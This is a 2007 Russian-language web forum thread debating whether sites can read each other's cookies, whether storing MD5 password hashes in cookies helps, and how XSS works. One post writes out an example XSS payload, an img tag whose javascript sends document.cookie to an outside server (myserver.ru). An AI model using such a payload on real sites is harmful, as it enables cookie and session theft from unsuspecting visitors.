0 Сообщения: 7 Зарегистрирован: 24.11.04 Откуда: Самара
Заголовок сообщения: Куки с чужого сайта Добавлено: 4 Октябрь 2007, 17:13:02
Люди!
Мож я че не догоняю?
Можно ли с одного сервера прочитать куки, оставленные другим сервером?
По логике и из соображений безопасности так не должно быть, вроде бы...
И еще уточнение:
если эти домены принадлежат тебе, то напрограммировать можно все что угодно.
Я например, написал объект который через базу симурирует "куку" доступную нескольким доменам.
_________________ Тот, кто задает вопрос, глупец в течение пяти минут, тот, кто его не задает, глупец всю свою жизнь. (Китайская поговорка)
20 Сообщения: 380 Зарегистрирован: 02.01.07 Откуда: у Майкла Дугласа базука?
Добавлено: 5 Октябрь 2007, 08:23:11
Куки - это зло для пользователя.
Заходишь на какой-нить красочный сайтец,
а там между всеми прочими делами,
берется из браузера вся кука и пишется куда нужно.
Учитывая, что большинство пользователей любят автологин,
т.е. логин и пароль в примитивном виде храниться в энтой самой куке...
Куки - это зло для пользователя. Заходишь на какой-нить красочный сайтец, а там между всеми прочими делами, берется из браузера вся кука и пишется куда нужно.
Учитывая, что большинство пользователей любят автологин, т.е. логин и пароль в примитивном виде храниться в энтой самой куке...
0 Сообщения: 7 Зарегистрирован: 24.11.04 Откуда: Самара
Добавлено: 5 Октябрь 2007, 15:13:33
prometheus, тебе же говорят, что куки может прочесть только тот сайт, который его поставил, или тот, которому доверяет тот сайт, который ставил, т.е. "вся кука" никуда налево не уплывет
тот форум, в котором сейчас ковыряюсь, хранит пароль юзера в хешированном виде
видимо для того, чтобы затруднить жизнь тем, кто сумеет провести XSS-атаку
Мсье, купите себе книжку про HTTP. Что-нибудь попроще.
Куки вообще нельзя "прочитать". Клиент -- браузер -- высылает их сам независимо от желания сервера. Соответственно, прочесть куки другого сайта нельзя. Никак. Ввиду отсутствия операции чтения.
Но: сайт может сам, добровольно, попросить зашедший к нему браузер, чтобы тот ПОТОМ, совершенно ДОБРОВОЛЬНО отдал вот эту конкретную куку ВОН ТОМУ конкретному сайту. Если случится на ТОТ сайт зайти. Независимо от желания ТОГО сайта.
Так что никаких угроз безопасности здесь нет и никакие пароли здесь не при чем.
тот форум, в котором сейчас ковыряюсь, хранит пароль юзера в хешированном виде видимо для того, чтобы затруднить жизнь тем, кто сумеет провести XSS-атаку
Что-то мне это напоминает очередной поток сознания.
1. Какая связь между формой хранения пароля и тем, что ложится в куку? У вас форум пароль в куку кладет, пусть даже и в виде md5?
2. Предположим, что в куке тупо лежит живой, нешифрованный пароль. Чем это поможет проводить XSS?
20 Сообщения: 380 Зарегистрирован: 02.01.07 Откуда: у Майкла Дугласа базука?
Добавлено: 6 Октябрь 2007, 17:37:54
Crazy писал(а):
Мсье, купите себе книжку про HTTP. Что-нибудь попроще.
Куки вообще нельзя "прочитать". Клиент -- браузер -- высылает их сам независимо от желания сервера. Соответственно, прочесть куки другого сайта нельзя. Никак.
Ой, как интересно,
у нас, на сайтах некоторых (избранных) клиентов, есть такая штука,
что когда при генерации какой-либо страницы происходит ошибка,
система генерит детальный отчет о произошедшем.
Это значит, что система уведомляет,
где произошла ошибка - адрес документа,
движковые ошибки - т.е. при обработке какого модуля,
а также детальная информация по клиенту (USER-AGENT и COOKIES).
Куки обычно содержат инфу не только по данному домену, где произошла ошибка,
но также данные профилей других сайтов, пароли, логины...
0 Сообщения: 7 Зарегистрирован: 24.11.04 Откуда: Самара
Добавлено: 7 Октябрь 2007, 12:04:24
Цитата:
1. Какая связь между формой хранения пароля и тем, что ложится в куку? У вас форум пароль в куку кладет, пусть даже и в виде md5?
2. Предположим, что в куке тупо лежит живой, нешифрованный пароль. Чем это поможет проводить XSS?
Дабы не казаться полным лузером, поясню:
1) да, имелось в виду, что пароль ложится в куки в виде md5
2) из моего сообщения следует только одно: тому, кто сумеет провести атаку, придется повозиться с захешированным паролем; я прекрасно осознаю, что куки на успешность проведения атаки никак не влияют
hspeed, каков смысл хранить в куке md5 от пароля? Чтобы пересылать этот md5 "как есть"? В таком случае это абсолютно ничем не отличается от хранения живого пароля.
По второму вопросу: как ты видишь процесс получения md5 пароля, который лежит в куке, с помощью XSS?
P.S. По поводу "повозиться" рекомендую набрать в гугле "md5 rainbow".
0 Сообщения: 7 Зарегистрирован: 24.11.04 Откуда: Самара
Добавлено: 8 Октябрь 2007, 08:05:25
Примерно так:
допустим, злоумышленнику из-за несовершенства фильтров в поле ввода сообщения удается в каком-нибудь треде повесить нечто типа
img src="javascript:'http://myserver.ru/index.php?c='+escape(document.cookie)" width=1 height=1
Это так в общих чертах
Каждый, кто зайдет в тред, отправит свои куки в базу на myserver.ru
Примерно так работают счетчики посещаемости а-ля SpyLog, только админ сайта добровольно такую штуку вешает на своем сайте
Сказочник, которому приходят письма с таким содержанием.
Мне абсолютно неинтересно, какие письма тебе от кого-то приходят. Факт получения тобой каких бы то ни было писем никак не подтверждает, что сервер может прочесть из браузера куки другого сайта.
Каждый, кто зайдет в тред, отправит свои куки в базу на myserver.ru
...и в результате myserver.ru получит MD5 от пароля. Соответственно, если наш сервер соглашается принимать для авторизации логин и MD5 от пароля, то злоумашленники вполне могут использовать перехваченную информацию для аутентификации от нашего имени.
Вывод: хранение в куке MD5 от пароля лишено какого бы то ни было смысла.
20 Сообщения: 380 Зарегистрирован: 02.01.07 Откуда: у Майкла Дугласа базука?
Добавлено: 8 Октябрь 2007, 10:46:41
Crazy писал(а):
Мне абсолютно неинтересно, какие письма тебе от кого-то приходят. Факт получения тобой каких бы то ни было писем никак не подтверждает, что сервер может прочесть из браузера куки другого сайта.
Вот берем и вставляем в данную форму для сообщений картинку-скрипт (cgi-bin/s.jpg) и усе Кукис чувака, который откроет страничку уйдут куда нужно.
Вот пример такого сниффера -
К сожалению, "картинки-скрипт" , упомянутая на этой страничке, более не существует (Error 404), так что проверить твои фантазии не представляется возможным.
Последний раз редактировалось Crazy 8 Октябрь 2007, 11:01:00, всего редактировалось 1 раз.
Кстати, для экономии времени: не нужно пытаться реализовать свои фантазии через XSS. При использовании XSS высылаются не куки, а параметры запроса.
Заодно дарю тебе крутой код, позволяющий прочесть куки (и не только) пользователя:
Код:
Дорогой пользователь, пожалуйста введи здесь все свои куки, логины и пароли и нажми кнопку: <form action="somehost.com" method="post"> <textarea></textarea> <input type=submit> </form>
Уровень доступа: Вы не можете начинать темы. Вы не можете отвечать на сообщения. Вы не можете редактировать свои сообщения. Вы не можете удалять свои сообщения. Вы не можете добавлять вложения.
Новости дизайна |
Галереи |
О проекте |
RSS
Правила |
FAQ |
Поиск |
Наша команда |
Регистрация |
Вход
Что мешает хранить инфу в зашифрованном виде? например функция md5